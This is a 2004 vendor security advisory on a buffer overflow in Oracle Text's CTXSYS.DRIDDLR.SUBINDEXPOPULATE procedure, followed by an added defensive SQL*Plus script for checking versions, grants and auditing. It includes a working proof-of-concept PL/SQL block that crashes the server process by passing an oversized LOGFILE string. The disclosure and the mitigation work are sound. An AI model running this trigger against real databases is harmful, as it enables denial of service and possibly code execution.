Application Security, Inc.

Team SHATTER Security Alert

#44 - Buffer overflow in procedure SUBINDEXPOPULATE of DRIDDLR package

August 31, 2004

Credit: This vulnerability was researched and discovered by Esteban Martínez Fayó of Application Security, Inc.

Risk level: Low

Details:
When the SUBINDEXPOPULATE procedure of the CTXSYS.DRIDDLR package (Oracle Text) is called with a long string in the LOGFILE parameter, a buffer overflow occurs. The other parameters are not involved; any valid values can be supplied for them.

To reproduce the overflow, execute the following PL/SQL block (for example from SQL*Plus, connected as a user that holds EXECUTE on CTXSYS.DRIDDLR):

DECLARE
  P_INDEXID NUMBER;
  P_SLAVEID NUMBER;
  P_OPCODE NUMBER;
  P_LOGFILE VARCHAR2(32767);
  P_IDXMEM NUMBER;
  AAA VARCHAR2(32767);
BEGIN
  -- Build a 16384-byte string of 'A' by doubling a single character 14 times (2^14 = 16384),
  -- which stays within the 32767-byte PL/SQL VARCHAR2 limit.
  AAA := 'A';
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA; AAA:=AAA || AAA;
  -- Remaining arguments only need to be syntactically valid; they do not affect the overflow.
  P_INDEXID := 1;
  P_SLAVEID := 1;
  P_OPCODE := 1;
  -- The oversized LOGFILE argument is what triggers the overflow.
  P_LOGFILE := AAA;
  P_IDXMEM := 1;
  CTXSYS.DRIDDLR.SUBINDEXPOPULATE(INDEXID => P_INDEXID, SLAVEID => P_SLAVEID, OPCODE => P_OPCODE, LOGFILE => P_LOGFILE, IDXMEM => P_IDXMEM);
END;
/

Analysis:
This vulnerability can be exploited by users connected with the SYSDBA privilege and by any user granted EXECUTE permission on the CTXSYS.DRIDDLR package.
Successful exploitation allows an attacker to execute arbitrary code in the context of the Oracle server process. It can also be used to cause a denial of service (DoS) by crashing the Oracle server process that handles the attacker's session.

Vendor Fix:
Fixed in Oracle 9i Release 2 Patch Set 4 (9.2.0.5), Patch 3. Oracle 10g Release 1 is not vulnerable.
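The Analysis and Vendor Fix sections above give a DBA two things to verify: which Oracle Text version is installed, and who holds EXECUTE on the affected package. The following SQL*Plus script is an added example and is not part of the original advisory or of Oracle's patch; it uses only standard data-dictionary views (DBA_REGISTRY, DBA_TAB_PRIVS) and the standard AUDIT statement, and it must be run by a DBA-privileged account. Rather than revoking anything automatically, it prints the REVOKE statements for review, because Oracle Text index maintenance by non-CTXSYS users may depend on some of those grants (an assumption to confirm in a test environment before revoking).

```sql
-- Added example (not from the original advisory): pre-patch checks for the
-- CTXSYS.DRIDDLR.SUBINDEXPOPULATE overflow. Run in SQL*Plus as a DBA.
SET SERVEROUTPUT ON SIZE 100000

-- 1. Installed Oracle Text (component id CONTEXT) version. The advisory states
--    that 9.2.0.5 with Patch 3 is fixed and that 10g Release 1 is not affected.
SELECT comp_id, comp_name, version, status
  FROM dba_registry
 WHERE comp_id = 'CONTEXT';

-- 2. Grantees that can reach the vulnerable procedure. EXECUTE on the package is
--    the precondition named in the Analysis section; PUBLIC here would mean every
--    database account can trigger the overflow.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'CTXSYS'
   AND table_name = 'DRIDDLR'
 ORDER BY grantee;

-- 3. Generate (but do not execute) a REVOKE for each non-owner grantee so the
--    list can be reviewed before any grant is removed as an interim mitigation.
BEGIN
  FOR r IN (SELECT grantee
              FROM dba_tab_privs
             WHERE owner = 'CTXSYS'
               AND table_name = 'DRIDDLR'
               AND privilege = 'EXECUTE'
               AND grantee <> 'CTXSYS'
             ORDER BY grantee)
  LOOP
    DBMS_OUTPUT.PUT_LINE('REVOKE EXECUTE ON ctxsys.driddlr FROM ' || r.grantee || ';');
  END LOOP;
END;
/

-- 4. Record every call to the package until the patch is applied, so attempts to
--    trigger the overflow show up in the audit trail (requires the AUDIT_TRAIL
--    initialization parameter to be enabled; entries appear in DBA_AUDIT_OBJECT).
AUDIT EXECUTE ON ctxsys.driddlr BY ACCESS;
```

Step 2 is the one that matters most for risk rating: the advisory's "Low" risk assumes EXECUTE on CTXSYS.DRIDDLR is restricted. If that query returns PUBLIC or broadly used application roles, the exposure on an unpatched 9.2.0.x instance is considerably wider than the rating suggests.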